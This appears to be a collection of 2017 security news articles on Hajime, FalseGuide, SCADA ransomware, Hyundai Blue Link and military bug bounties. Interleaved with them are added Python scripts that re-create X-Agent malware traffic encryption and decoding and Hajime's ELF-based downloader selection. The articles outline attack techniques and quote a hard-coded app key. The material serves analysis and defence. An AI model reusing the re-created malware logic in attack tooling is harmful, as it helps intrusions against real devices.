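    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xagent_encode(plaintext: bytes, rand4: bytes, rand8: bytes, timestamp7: bytes) -> str:
    """Re-creation of the encryption steps listed in the report, used here only to
    build sample traffic: key = seed || 4 random bytes; RC4 output || 8 random
    bytes -> URL-safe BASE64; a 7-character timestamp is then prepended
    (assumption: the report says the encoded part keeps its trailing '=')."""
    assert len(rand4) == 4 and len(rand8) == 8 and len(timestamp7) == 7
    blob = rc4(SEED + rand4, plaintext) + rand8
    return (timestamp7 + base64.urlsafe_b64encode(blob)).decode("ascii")


def xagent_decode(encoded: str, max_tries: int = 1 << 32):
    """Recover the plaintext of one captured x-agent query string or POST body.

    Strips the 7-character timestamp and the 8 trailing random bytes, then tries
    candidate 4-byte key suffixes until the known data token appears (a
    known-plaintext search over at most 2^32 candidates; max_tries only bounds
    the demo). Returns (plaintext, rand4), or None if no candidate matches."""
    blob = base64.urlsafe_b64decode(encoded[7:])
    cipher = blob[:-8]
    for candidate in range(max_tries):
        rand4 = struct.pack("<I", candidate)  # byte order is irrelevant: every value gets tried
        # Decrypting only the first 20 bytes is enough to test for the token.
        if rc4(SEED + rand4, cipher[:len(DATA_TOKEN)]) == DATA_TOKEN:
            return rc4(SEED + rand4, cipher), rand4
    return None


# Constructed sample: the 39-byte initial AgentKernel message from the report
# (token, sender module ID, '#'-separated module list), encrypted with a
# deliberately small random suffix so the search finishes instantly.
INITIAL_MESSAGE = DATA_TOKEN + bytes.fromhex("6B3084F2010000010023011023011123011323")
SAMPLE_RAND4 = struct.pack("<I", 1234)
SAMPLE_POST = xagent_encode(INITIAL_MESSAGE, SAMPLE_RAND4, b"\x99" * 8, b"AbCdEfG")

if __name__ == "__main__":
    # 39 + 8 = 47 bytes -> 64 BASE64 chars ending in '=', plus 7 -> 71, as the report states.
    print(len(SAMPLE_POST), "characters:", SAMPLE_POST)
    plaintext, rand4 = xagent_decode(SAMPLE_POST, max_tries=5000)
    print("key suffix", rand4.hex(), "plaintext", plaintext)
```

The same length arithmetic reproduces the 51-character GET query string for a 24-byte message (token plus 4-byte agent ID): 32 bytes encode to 44 characters ending in "=", plus the 7-character timestamp.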
Hack the Air Force bug bounty initiative is going to start
27.4.2017 securityaffairs BigBrothers
The United States Air Force has launched the ‘Hack the Air Force’ bug bounty program to test the security of its networks and computer systems.
I have discussed many times the importance and the numerous advantages of a bug bounty program.
Bug bounties are very popular initiatives among white hat communities and major companies, including Facebook, Google, and Microsoft. Facebook, for example, announced that it has paid more than $3 million since 2011, when its bug bounty program was launched.
A year ago the Pentagon launched the ‘Hack the Pentagon’ initiative, the first-ever program of its kind, that aims to test the resilience to cyber attacks of the US defenses.
News of the day is that the United States Air Force has announced the ‘Hack the Air Force’ bug bounty program to test the security of its networks and computer systems.
The initiative was announced yesterday by the US Air Force via a Facebook live stream; the bug bounty initiative is operated by HackerOne and called ‘Hack the Air Force’.
White-hat hackers are invited to participate in the programme to find security vulnerabilities affecting systems exposed on the Internet by the US Air Force.
The US Government will pay for any bug discovered under the ‘Hack the Air Force’ initiative.
“We have millions of probes a day, a week, on our DoD systems quite frankly. These are probably people out there, around the world, who particularly aren’t friendly with the Department of Defense. And they generally don’t tell us what’s wrong with our systems until we find out that something’s been hacked. And so I want to turn that around. I want to know beforehand where our vulnerabilities are. I know we have vulnerabilities, and I want to know where those are in the United States Air Force.” said Chief Information Security Officer Peter Kim.
Kim highlighted the importance of an external security assessment of the US Air Force’s systems: it is essential to discover vulnerabilities before threat actors do, and bug bounty initiatives are very useful in this sense.
Researchers and white-hat hackers who want to participate in the challenge will need to register on the HackerOne website; the operators behind the platform will then make the necessary checks before granting access to the programme.
Military members and government civilians are not eligible for compensation, but they can still participate on duty with supervisor approval.
Registration for Hack the Air Force is scheduled to begin May 15th and is open to United States, UK, Australian, New Zealand, and Canadian citizens. These states belong to the so-called Five Eyes intelligence alliance. The Hack the Air Force bug bounty program will run from May 30 to June 23.
Experts believe the US Government and the US Air Force may run other bug bounty initiatives in the future.
At the time of writing there is no news about the total amount of money reserved for the initiative; the DoD’s Hack the Pentagon initiative paid $75,000 in bounties, and the Department of Defense has in the past offered bounty payments of up to $150,000 for hackers who discover security vulnerabilities.
Hajime ‘Vigilante Botnet’ Growing Rapidly; Hijacks 300,000 IoT Devices Worldwide
27.4.2017 thehackernews BotNet
Last week, we reported about a so-called 'vigilante hacker' who hacked into at least 10,000 vulnerable 'Internet of Things' devices, such as home routers and Internet-connected cameras, using a botnet malware in order to supposedly secure them.
Now, that vigilante hacker has already trapped roughly 300,000 devices in an IoT botnet known as Hajime, according to a new report published Tuesday by Kaspersky Lab, and this number will rise with each day that passes by.
The IoT botnet malware emerged in October 2016, around the same time the infamous Mirai botnet threatened the Internet with record-setting distributed denial-of-service (DDoS) attacks against the popular DNS provider Dyn.
How the Hajime IoT Botnet Works
The Hajime botnet works much like Mirai: it spreads via unsecured IoT devices that have open Telnet ports and still use default passwords, and it uses the same list of username and password combinations that Mirai is programmed to use.
The interesting part of Hajime, however, is that, unlike Mirai, once it infects an IoT device it secures the device by blocking access to four ports (23, 7547, 5555, and 5358) known to be the most widely used vectors for infecting IoT devices, keeping Mirai and other threats at bay.
Hajime also uses a decentralized peer-to-peer network (instead of a command-and-control server) to issue updates to infected devices, making it more difficult for ISPs and other providers to take down the botnet.
One of the most interesting things about Hajime is the botnet also displays a cryptographically signed message every 10 minutes or so on infected device terminals, describing its creators as "just a white hat, securing some systems."
Unlike Mirai and other IoT botnets, Hajime lacks DDoS capabilities and any other attack functionality beyond the propagation code that lets one infected IoT device search for other vulnerable devices and infect them.
But What if…?
What's not known is what the Hajime botnet is for, or who is behind it.
"The most intriguing thing about Hajime is its purpose," Kaspersky security researchers say. "While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven’t seen it being used in any type of attack or malicious activity," adding that "its real purpose remains unknown."
The researchers also believe that this might not happen, because the Hajime botnet takes steps to hide its running processes and files on the file system, making the detection of infected systems more difficult.
So far, the purpose behind building this botnet is not entirely clear, but all signs yet point to a possible white-hat hacker, who is on his/her mission to secure open and vulnerable systems over the Internet.
However, the most concerning issue of all — Is there any guarantee that the Hajime author will not add attack capabilities to the worm to use the hijacked devices for malicious purposes?
Maybe today the Hajime author is on a mission to secure the world, but tomorrow, on realizing that money can be made online by renting the botnet to others, the author could be another Adam Mudd.
Mudd, a 19-year-old teenager, was recently sentenced to 2 years in prison for creating and running a DDoS-for-hire service called 'Titanium Stresser' that claimed more than 1.7 million victims of DDoS attacks since 2013.
Secondly, what if the well-intentioned botnet is hijacked by some malicious actor?
If this happens, the vigilante IoT botnet could be used for malicious purposes, such as conducting DDoS attacks against online sites and services, spreading malware, or bricking all the infected devices at one click.
Radware researchers also believe that the flexible and extensible nature of the Hajime botnet could be used for malicious purposes such as those mentioned above, as well as for conducting real-time mass surveillance through Internet-connected webcams, according to a new threat advisory published Wednesday by Radware.
Last but not least: do we seriously need vigilante hackers to protect our devices and networks?
This solution could only be temporary, trust me. The latest Hajime botnet, for example, is nothing but a band-aid.
Since Hajime has no persistence mechanism, as soon as the infected device is rebooted, it goes back to its previously unsecured state, with default passwords and the Telnet port open to the world.
How to Protect your IoT devices?
The only true solution is you. Instead of just sitting there, doing nothing and waiting for some vigilante hacker to work miracles, you can protect your IoT devices in a way that Hajime or any well-intentioned botnet can't.
So go and update the firmware of your devices, change their default passwords, put them behind a firewall, and if any device is vulnerable by default and cannot be updated, throw it away and buy a new one.
Just keep in mind: once a single IoT device of yours is compromised, your whole network is at risk of compromise, and so are all the devices connected to it.
DoD Launches "Hack the Air Force" Bug Bounty Program
27.4.2017 securityweek BigBrothers
Following the success of the “Hack the Pentagon” and “Hack the Army” initiatives, the U.S. Department of Defense announced on Wednesday the launch of the “Hack the Air Force” bug bounty program.
“Hack the Air Force” will be the Pentagon’s largest bug bounty project as it’s open to experts not only from the United States, but also from the Five Eyes countries, which include the United Kingdom, Canada, Australia and New Zealand.
The program, run on the HackerOne platform, aims to help the Air Force strengthen its critical assets. White hat hackers who report vulnerabilities will be eligible for monetary rewards, but the exact amounts have not been specified.
Only vetted researchers can register; military members and government civilians can participate, but they will not earn any rewards.
“This is the first time the AF has opened up our networks to such a broad scrutiny,” said Air Force Chief Information Security Officer Peter Kim. “We have malicious hackers trying to get into our systems every day. It will be nice to have friendly hackers taking a shot and, most importantly, showing us how to improve our cybersecurity and defense posture. The additional participation from our partner nations greatly widens the variety of experience available to find additional unique vulnerabilities.”
Registration for “Hack the Air Force” opens on May 15. The event will take place between May 30 and June 23.
A total of 371 people registered for the previous Hack the Army program. They submitted 416 vulnerability reports, 118 of which were classified as unique and actionable. Participants were awarded roughly $100,000.
Hack the Pentagon received 138 valid submissions and it cost the U.S. government $150,000, half of which went to participants.
The Hajime Botnet continues to grow and implements a new attack technique
27.4.2017 securityaffairs BotNet
The mysterious Hajime Botnet continues to grow and reached 300,000 IoT Devices, the author also implemented a new attack method.
Recently, experts from Symantec spotted a new IoT botnet dubbed Hajime that has been spreading quickly in recent months, mostly in Brazil and Iran.
The Hajime malware was first spotted in October 2016; it implements the same mechanism the Mirai botnet uses to spread itself. The threat targets unsecured IoT devices with open Telnet ports that still use default passwords. Researchers discovered that Hajime uses the same list of username and password combinations as Mirai, plus two more.
Unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.
“There isn’t a single C&C server address, instead the controller pushes command modules to the peer network and the message propagates to all the peers over time. This is typically considered a more robust design as it makes takedowns more difficult.” reads the analysis published by Symantec.
Hajime is more sophisticated than Mirai: it implements more mechanisms to hide its activity and running processes, and it has a modular structure that allows its operators to add new capabilities on the fly.
The analysis of Hajime reveals that it doesn’t implement distributed denial of service (DDoS) capabilities or any other attack code. Symantec researchers noticed that Hajime fetches a statement from its controller and displays it on the terminal every 10 minutes. The message is:
Just a white hat, securing some systems. Important messages will be signed like this!
Hajime Author.
Contact CLOSED
Stay sharp!
The message is digitally signed, and the worm will only accept messages signed by a hardcoded key. Once it has infected a system, the worm blocks access to ports 23, 7547, 5555, and 5358 in order to prevent attacks from other IoT threats, including Mirai.
Experts believe Hajime could be the work of a cyber vigilante; in the past we have observed similar code, such as the Linux.Wifatch discovered by Symantec in October 2015.
According to new research conducted by Kaspersky Lab, the Hajime botnet continues to grow and has already recruited up to 300,000 IoT devices.
The author of Hajime is continuing to update the code; researchers at Kaspersky observed recent changes in the attack module introducing TR-069 exploitation. Currently, the bot implements three different attack methods: TR-069 exploitation, Telnet default password attack, and Arris cable modem password of the day attack.
“Technical Report 069 is a standard published by the Broadband Forum, which is an industry organization defining standards used to manage broadband networks. Many ISPs and device manufacturers are members of the Broadband Forum. TR-069 allows ISPs to manage modems remotely. TCP port 7547 has been assigned to this protocol, but some devices appear to use port 5555 instead.” reads the analysis published by Kaspersky.
“The TR-069 NewNTPServer feature can be used to execute arbitrary commands on vulnerable devices.”
The TR-069 attack was used last year when hackers compromised more than 900,000 routers from Deutsche Telekom.
Experts at Kaspersky discovered that the Hajime botnet targets any device on the Internet with the exception of specific networks and devices. The author of the threat recently improved the detection logic of the malicious code.
“Once the attack successfully passes the authentication stage, the first 52 bytes of the victim’s echo binary are read. The first 20 bytes, which is the ELF header, hold information about the architecture, operating system and other fields. The victim’s echo ELF header is then compared against a predefined array, containing the Hajime stub downloader binaries for different architectures.” states Kaspersky. “This way the correct Hajime-downloader binary that works on the victim’s machine, can be uploaded from the attacker (which is actually the infected device that started the attack).”
A honeypot set up by Kaspersky registered 2,593 successful Hajime telnet attacks during a 24-hour period. 2,540 of them originated from unique IP addresses, 949 of the hosts provided a payload, and 528 of them had an active web server running on port 80/tcp.
Most attacks were powered by compromised devices located in Vietnam (20.04%), Taiwan (12.87%) and Brazil (8.94%).
“The most intriguing thing about Hajime is its purpose. While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven’t seen it being used in any type of attack or malicious activity. Nevertheless, we advise owners of IoT devices to change the password of their devices to one that’s difficult to brute force and to update the firmware if possible,” concluded Kaspersky.
New SCADA Flaws Allow Ransomware, Other Attacks
27.4.2017 securityaffairs ICS
Ransomware attack on SCADA
SINGAPORE — ICS CYBER SECURITY CONFERENCE — Mission-critical control systems that don’t pose an obvious risk can be hijacked and leveraged for attacks by profit-driven cybercriminals and other threat actors, researchers warned.
Cybercriminals have been increasingly relying on ransomware to make a profit by taking hostage personal and business files. Experts have also started issuing warnings regarding the possibility of ransomware attacks targeting industrial systems.
Proof-of-concept (PoC) ransomware designed to target industrial control systems (ICS) was described recently by security firm CRITIFENCE and researchers at the Georgia Institute of Technology.
These attacks focused on programmable logic controllers (PLCs), which are often critical for operations and can represent a tempting and easy target for malicious actors. However, Alexandru Ariciu, ICS security consultant at Applied Risk, disclosed another potential target on Thursday at SecurityWeek’s ICS Cyber Security Conference in Singapore.
Ariciu showed that ransomware attacks, which he has dubbed “Scythe,” can also target SCADA devices that are inconspicuous and which may be considered less risky.
Affected vendors have not been named, but the devices have been described by the expert as various types of I/O systems that stand between field devices and the OPC server (e.g. remote terminal units, or RTUs). The devices are powered by an embedded operating system and they run a web server.
Thousands of these systems are easily accessible from the Internet, allowing attackers to hijack them by replacing their firmware with a malicious version.
The attack scenario developed and demonstrated by Applied Risk starts with the attacker scanning the Web for potential targets. According to Ariciu, many devices can be identified using the Shodan search engine, but even more targets can be found via a simple Google search.
Ariciu has tested four devices from different vendors and discovered nearly 10,000 systems accessible directly from the Internet. The researcher said most of these systems lack any authentication mechanism, allowing easy access.
The expert believes an attacker could identify widely used devices and concentrate on targeting those. Once the target has been identified, the attacker first needs to acquire the device and conduct hardware debugging on it to determine how it works. The general attack process is the same for all devices, but the exploit needs to be customized for each specific product.
It took Applied Risk three months of analyzing ports, using various hardware hacking techniques, firmware dumping, and reverse engineering to determine how each device works and how it can be attacked.
Ariciu pointed out that the hands-on analysis is required to create the exploit, but once the exploit has been developed the attack can be launched remotely against devices accessible from the Internet.
The attack relies on a firmware validation bypass vulnerability that can be exploited to replace the legitimate firmware with a malicious one. In the ransomware scenario described by Applied Risk, the attacker connects to the targeted device’s interface, creates a backup for the configuration of the targeted device, and installs firmware that disrupts regular processes.
The victim sees that the compromised device has been disconnected and when they access it for analysis they are greeted with a ransomware message.
In order to prevent the victim from restoring the firmware, the attacker can “disable” the firmware and configuration update functionality. The “restore factory settings” feature does not mitigate the attack in most cases as the process does not restore the original firmware. Nevertheless, this feature can also be disabled by a hacker.
While the attack described by Ariciu prevents the victim from restoring the firmware, the attacker is still able to restore the device and its configuration if the victim pays the ransom. That is because the firmware update functionality is not actually disabled. The user needs to know the name of the firmware file in order to launch an update. If the attacker assigns a random file name of 32 characters or more, it will be impossible for the victim to determine it and conduct the firmware update.
The researcher has warned that once they determine how a specific device can be hacked, attackers may be able to launch mass attacks by leveraging the firmware update utilities provided by vendors.
Based on the number of vulnerable devices accessible from the Internet, Applied Risk believes attackers could make millions of dollars through such a campaign. According to the security firm, many organizations admitted that such an attack could cause serious disruptions — the devices are often part of mission-critical systems — which increases the chances of the ransom being paid.
Organizations alerted by the security firm indicated that they had never considered making configuration backups, especially since these devices are rarely reconfigured once they are deployed. However, losing the configuration could have serious consequences considering that a significant amount of time is spent configuring the devices.
While Applied Risk has developed a PoC demonstrating a ransomware attack that would likely be launched by profit-driven cybercriminals, Ariciu told SecurityWeek that other types of attacks are also possible. For instance, the vulnerability can be exploited by sophisticated threat actors to damage devices, either for sabotage or as a distraction while a different attack is being launched.
The four companies whose products are affected have been notified. The devices are available at prices ranging between €300 and €1,000.
Two of the vendors, including a major player, acknowledged the severity of the firmware validation bypass vulnerability. However, they indicated that fixing the security hole is not an easy task and that they are still trying to identify the best approach for addressing the problem.
UK Government Complains After Twitter Cuts Data Access
27.4.2017 securityweek Social
The British government has complained to Twitter over a block on access to data from the social network, which it was reportedly using to track potential terror attacks, officials said Wednesday.
"The government has protested against this decision and is in ongoing discussions with Twitter to attempt to get access to this data," a Home Office spokesman said.
Prime Minister Theresa May's spokesman declined to specify exactly what the data was and why it was important, saying only that "we wish to have access to this information".
But he told reporters: "The fight against terrorism is not just one for the police and the security services. Social media and tech companies have a role to play."
The Daily Telegraph newspaper reported that the government had been tracking terms related to potential terror attacks via a third-party firm, but this had now been blocked.
In a blog posting in November, Twitter executive Chris Moody said the firm encouraged developers to create products that used real-time data from the social network "in the public interest", for example tracking emergencies and natural disasters.
"Recent reports about Twitter data being used for surveillance, however, have caused us great concern," he wrote.
He said that tracking or profiling protesters or activists was "absolutely unacceptable and prohibited", including via Twitter's application software programs.
"We prohibit developers using the Public APIs and Gnip data products from allowing law enforcement -- or any other entity -- to use Twitter data for surveillance purposes. Period," he said.
Security vulnerabilities in Hyundai Blue Link mobile app allowed hackers to steal vehicles
27.4.2017 securityaffairs Mobil
Security vulnerabilities in the Hyundai Blue Link mobile apps allowed hackers to steal vehicles; the car maker has fixed them.
Security vulnerabilities in the Hyundai Blue Link mobile apps could be exploited by hackers to locate, unlock and start vehicles of the carmaker.
The Blue Link application is available for both iOS and Android; it was developed to allow car owners to remotely access and monitor their vehicle.
The app implements many features including remote engine start, cabin temperature control, stolen vehicle recovery, remote locking and unlocking, vehicle health reports, and automatic collision notifications.
Researchers at security firm Rapid7 discovered two potentially serious vulnerabilities affecting the log transmission feature added in December 2016.
According to the experts, versions 3.9.4 and 3.9.5 of the Blue Link mobile apps upload an encrypted log file to a static IP address over HTTP on port 8080. The file contains several pieces of information, including login credentials, PIN, and historical GPS data. The name of the file includes the user’s email address.
The experts also discovered that the log file is encrypted with the hard-coded key “1986l12Ov09e”, which cannot be changed.
A hacker can mount a man-in-the-middle (MitM) attack to intercept the HTTP traffic associated with the Blue Link mobile application and access the log file.
“Affected versions of Hyundai Blue Link mobile application upload application logs to a static IP address over HTTP on port 8080. The log is encrypted using a symmetrical key, “1986l12Ov09e”, which is defined in the Blue Link application (specifically, C1951e.java), and cannot be modified by the user.” states the analysis published by Rapid7.
Clearly, the information contained in the log file can be used by the attacker to locate, unlock and start the targeted vehicle.
The ICS-CERT released a security advisory on the flaws affecting the Hyundai Blue Link mobile app. The two flaws reported in the advisory are the MitM vulnerability tracked as CVE-2017-6052 and rated as a medium severity issue and the hardcoded cryptographic key weakness tracked as CVE-2017-6054 and rated as high severity.
“Successful exploitation of these vulnerabilities may allow a remote attacker to gain access to insecurely transmitted sensitive information, which could allow the attacker to locate, unlock, and start a vehicle associated with the affected application.” states the advisory.
According to Hyundai, there was no evidence that the vulnerabilities had been exploited by threat actors in the wild.
“Rapid7 working with Hyundai Motor America reports that it would be difficult to impossible to conduct this attack at scale, since an attacker would typically need to first subvert physically local networks, or gain a privileged position on the network path from the app user to their service instance.”
Both issues were reported by Rapid7 in February; Hyundai patched them in March with the release of Blue Link mobile app version 3.9.6 for both iOS and Android.
Blue Link mobile app version 3.9.6 disabled the log transmission and the TCP service located at the IP address where the log files were sent.
The update of the app is mandatory for all users.
Mysterious Hajime Botnet Grows to 300,000 IoT Devices: Kaspersky
26.4.2017 securityweek BotNet
Hajime, a piece of Internet of Things (IoT) malware that emerged in October 2016, has already ensnared roughly 300,000 devices in a botnet, Kaspersky Lab researchers say.
The malware emerged around the same time the infamous Mirai botnet started making the rounds, and is targeting the same devices that this threat does, but without using them to launch distributed denial of service (DDoS) attacks. Instead, it simply closes some ports to keep the infected devices away from Mirai and similar threats.
Called Hajime to keep the naming scheme in line with Mirai (they mean “beginning” and “future” in Japanese, respectively), the worm managed to build a peer-to-peer (P2P) botnet, but researchers aren’t sure about its purpose right now. Symantec said recently that a white hat hacker could have created the malware, but suggested that the botnet could be easily repurposed for nefarious operations.
What’s certain, however, is that Hajime’s author continues to update the code, as recently made changes were seen in the attack module. At the moment, the worm supports three different attack methods: TR-069 exploitation, Telnet default password attack, and Arris cable modem password of the day attack. The TR-069 exploit was implemented only recently, Kaspersky reveals.
TR-069 (Technical Report 069), a standard published by the Broadband Forum, is used by ISPs to manage modems remotely via TCP port 7547 (some devices use port 5555). By abusing the TR-069 NewNTPServer feature, attackers can execute arbitrary commands on vulnerable devices. Late last year, the TR-069 attack was used to crash nearly 1 million modems from Deutsche Telekom.
According to Kaspersky, Hajime attacks any device on the Internet with the exception of several networks, and its author recently improved the architecture detection logic. Thus, after passing the authentication stage, the malware reads the first 52 bytes of the victim’s echo binary (information about architecture and operating system is in the first 20 bytes), and then compares the echo ELF header against a predefined array, so as to fetch the correct Hajime-downloader binary.
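The architecture-detection step described here and in the Kaspersky quote in the earlier securityaffairs article (reading the first 20 bytes of the victim's echo binary and matching its ELF header against a table of per-architecture downloaders), as an added Python example that is not Hajime's or Kaspersky's code. The ELF constants come from the ELF specification; the sample headers and the downloader table are constructed for the demo.

```python
"""Decode the first 20 bytes of an ELF file and pick a matching binary.

Added example, not the worm's own code. The first 16 bytes are e_ident
(magic, class, data encoding, version, OS ABI, padding); bytes 16..19 are
e_type and e_machine, stored in the file's own byte order. DOWNLOADERS is a
constructed stand-in for the worm's predefined array of stub binaries.
"""
import struct

ELF_MAGIC = b"\x7fELF"
CLASSES = {1: "ELF32", 2: "ELF64"}            # EI_CLASS
ENDIANS = {1: "<", 2: ">"}                    # EI_DATA -> struct byte order
MACHINES = {                                  # e_machine values from the spec
    3: "x86", 8: "mips", 20: "ppc", 40: "arm",
    42: "sh", 62: "x86_64", 183: "aarch64",
}


def parse_ident(head: bytes) -> dict:
    """Decode e_ident plus e_type/e_machine from at least 20 header bytes."""
    if len(head) < 20:
        raise ValueError("need at least 20 bytes of ELF header")
    if head[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data, ei_osabi = head[4], head[5], head[7]
    if ei_class not in CLASSES or ei_data not in ENDIANS:
        raise ValueError("unknown ELF class or data encoding")
    # e_type and e_machine must be read in the file's declared byte order.
    e_type, e_machine = struct.unpack(ENDIANS[ei_data] + "HH", head[16:20])
    return {
        "class": CLASSES[ei_class],
        "endian": "little" if ei_data == 1 else "big",
        "osabi": ei_osabi,
        "type": e_type,
        "machine": MACHINES.get(e_machine, "unknown(%d)" % e_machine),
    }


# Constructed table keyed on (class, endianness, machine); a real table would
# hold one stub binary per supported target.
DOWNLOADERS = {
    ("ELF32", "little", "arm"): "stub-arm-le",
    ("ELF32", "big", "mips"): "stub-mips-be",
    ("ELF32", "little", "mips"): "stub-mipsel",
    ("ELF64", "little", "x86_64"): "stub-x86_64",
}


def select_downloader(head: bytes):
    """Return the table entry matching the header, or None if unsupported."""
    info = parse_ident(head)
    return DOWNLOADERS.get((info["class"], info["endian"], info["machine"]))


def make_header(ei_class: int, ei_data: int, e_machine: int,
                osabi: int = 0, e_type: int = 2) -> bytes:
    """Build a constructed 20-byte header prefix (EI_VERSION = 1)."""
    ident = ELF_MAGIC + bytes([ei_class, ei_data, 1, osabi]) + bytes(8)
    return ident + struct.pack(ENDIANS[ei_data] + "HH", e_type, e_machine)


if __name__ == "__main__":
    # Constructed sample: a 32-bit big-endian MIPS executable.
    sample = make_header(1, 2, 8)
    print(parse_ident(sample), select_downloader(sample))
```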
On the other hand, despite Hajime being able to attack any device, the authors focused on some specific brands/devices, as the worm uses only specific username-password combinations to brute-force its way into vulnerable devices. The threat uses one combination or the other based on words contained in the welcome message when opening a telnet session.
Instead of the telnet passwords, the malware uses a specially crafted password of the day when it encounters Arris cable modems. Although the ARRIS password of the day is a remote backdoor known since 2009, many ISPs don’t bother changing the default seed at all. After successfully compromising these devices, Hajime gains access to a remote shell and can execute commands.
During a 24-hour period, Kaspersky’s honeypot registered 2,593 successful telnet Hajime attacks. 2,540 came from unique IP addresses, 949 of the hosts provided a payload, and 528 of them had an active web server running at port 80/tcp. Most attacking devices (which were themselves victims to Hajime) were located in Vietnam (20.04%), Taiwan (12.87%) and Brazil (8.94%).
Looking at infected peers as DHT seeders, the researchers discovered 15,888 unique infected boxes, most located in Iran (14.38%), Vietnam (11.45%) and Brazil (6.94%). When looking at infected peers as DHT leechers, however, the researchers found 297,499 unique infected hosts, all of which were requesting Hajime config. Iran (19.65%), Brazil (8.80%), and Vietnam (7.87%) are affected the most.
“The most intriguing thing about Hajime is its purpose. While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven’t seen it being used in any type of attack or malicious activity. Nevertheless, we advise owners of IoT devices to change the password of their devices to one that’s difficult to brute force and to update the firmware if possible,” Kaspersky notes.
Cybersecurity Executive Order Recommendation issued by ISC2
26.4.2017 securityaffairs Cyber
(ISC)² delivered recommendations to the White House urging that workforce development be prioritized in the final version of the cybersecurity executive order.
The nonprofit organization (ISC)² has issued a recommendation calling on President Trump to make workforce development a priority when he issues the final version of the cybersecurity executive order. The main goal is to tackle the lack of professionals and to address the uncertainty across the industry.
Industry leaders and government agencies developed the recommendations in a move aimed at countering the hiring-freeze executive order, which has limited investment in cybersecurity.
The lack of new cybersecurity professionals and talent entering the industry is compounded by senior professionals leaving the market for retirement.
The emerging threat landscape of new menaces and the progress already made in the cyber security field were taken into account, as were the views of human resources personnel on incentivizing job acquisition, hiring, and retention.
Other recommendations include developing communicators who can translate technical risks for board members, retaining talent, and a new NIST-based approach to compliance centered on resilience.
The recommendation takes into account recent data breaches and new threats such as ransomware and IoT. It underlines that security does not reside in compliance but in defense in depth and in board members understanding the risks that stem from a lack of personnel and a lack of understanding of new technologies.
The recommendations come during President Trump’s first 100 days in office, so that the executive orders can address all the topics and furthermore prepare the nation for the future. (ISC)² also urged the White House to address the formation of a Cyber National Guard, which would help science, technology, engineering and math graduates repay their student loans if they accept work for federal agencies.
Sources:
http://www.darkreading.com/operations/isc2-issues-white-house-cybersecurity-executive-order-recommendations/d/d-id/1328685?_mc=RSS_DR_EDT
http://blog.isc2.org/isc2_blog/2017/04/isc2-cybersecurity-workforce-recommendations.html
http://www.executivegov.com/2017/04/nonprofit-offers-white-house-recommendations-to-bolster-federal-cyber-workforce/
Beware! New Android Malware Infected 2 Million Google Play Store Users
26.4.2017 thehackernews Android
Initially thought to be 600,000 users, the number of Android users who have mistakenly downloaded and installed malware on their devices straight from Google Play Store has reached 2 Million.
Yes, about 2 Million Android users have fallen victim to malware hidden in over 40 fake companion guide apps for popular mobile games, such as Pokémon Go and FIFA Mobile, on the official Google Play Store, according to security researchers from Check Point.
Dubbed FalseGuide by the Check Point researchers, the malware creates a "silent botnet out of the infected devices" to deliver fraudulent mobile adware and generate ad revenue for cybercriminals.
Nearly 2 Million Android Users Infected!
While it was initially believed that the oldest instance of FalseGuide was uploaded to Google Play in February and made its way onto over 600,000 devices within two months, further in-depth analysis by researchers revealed more infected apps dating back to November 2016.
"Since April 24, when the article below was first published, Check Point researchers learned that the FalseGuide attack is far more extensive than originally understood," Check Point researchers wrote in a blog post.
"The apps were uploaded to the app store [Google Play Store] as early as November 2016, meaning they hid successfully for five months, accumulating an astounding number of downloads."
Russian connection with FalseGuide
Check Point researchers discovered five additional apps containing the FalseGuide malware on Google Play Store, developed by "Anatoly Khmelenko" (translated from Russian Анатолий Хмеленко).
Also, the first batch of malicious apps was submitted under the Russian names of two fake developers, Sergei Vernik and Nikolai Zalupkin, which suggests the malware is of Russian origin.
FalseGuide attempts to turn infected devices into a botnet that could allow its operator to control the devices without the knowledge of the device owners.
Here's How FalseGuide Works:
Once downloaded to the victim's phone, FalseGuide requests device administrator permissions in an attempt to avoid being deleted by the user.
The malware then registers itself with Firebase Cloud Messaging – a cross-platform messaging service that allows app developers to send messages and notifications.
Once subscribed to this service, FalseGuide lets the attackers send messages containing links to additional malware and install it on the infected device, enabling the attackers to display illegitimate pop-up ads out of context and generate revenue.
Depending on their objectives, the attackers could also inject highly malicious code into an infected device to root it, conduct a Distributed Denial of Service (DDoS) attack, or even penetrate private networks.
Google Removed the Malware-Hiding Apps, but Are You Clean?
Check Point has provided a full list of malicious apps hiding FalseGuide, which posed as guides for FIFA Mobile, Criminal Case, Super Mario, Subway Surfers, Pokemon Go, Lego Nexo Knights, Lego City My City, Ninjago Tournament, Rolling Sky, Amaz3ing Spider-Man, Drift Zone 2, Dream League Soccer, and many more.
Check Point researchers notified Google about FalseGuide in February, after which the company silently removed the malware apps from the Play Store.
But despite being removed, the malicious apps are likely still active on a number of devices, leaving Android users open to cyber attacks.
"Mobile botnets are a growing trend since early last year, growing in both sophistication and reach," CheckPoint said. "This type of malware manages to infiltrate Google Play due to the non-malicious nature of the first component, which only downloads the actual harmful code."
How to Protect yourself against such Malware
There are standard protection measures you need to follow to remain unaffected:
Always download apps from trusted and verified developers and stick to trusted sources, like the Google Play Store and the Apple App Store.
Always verify app permissions before installing apps. If an app asks for more than it needs, just do not install it.
Keep a good antivirus app on your device that can detect and block such malware before it can infect your device, and always keep the app up to date.
Do not download apps from third-party sources. Although in this case the apps were distributed through the official Play Store, most often such malware is distributed via untrusted third-party app stores.
Avoid unknown and unsecured Wi-Fi hotspots and keep your Wi-Fi turned off when not in use.
Be careful which apps you give administrative rights to. Admin rights are powerful and can give an app full control of your device.
Never click on links in SMS or MMS messages sent to your mobile phone. Even if the message looks legitimate, go directly to the website of origin and verify any possible updates.
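The device-admin point above is the one a fleet administrator can actually check. The script below is an added example, not part of the Check Point report: it parses the "Enabled Device Admins" section of `adb shell dumpsys device_policy` output and flags any admin receiver that is not on an allowlist. SAMPLE_DUMPSYS is constructed to resemble that dump, and the package names and the allowlist in it are invented for this example.

```python
"""Triage which apps hold Device Administrator rights on an Android device.

Added example, not from the Check Point write-up: FalseGuide asks for device
admin rights so the user cannot simply uninstall it.  A defender can pull
`adb shell dumpsys device_policy` from each handset, parse the
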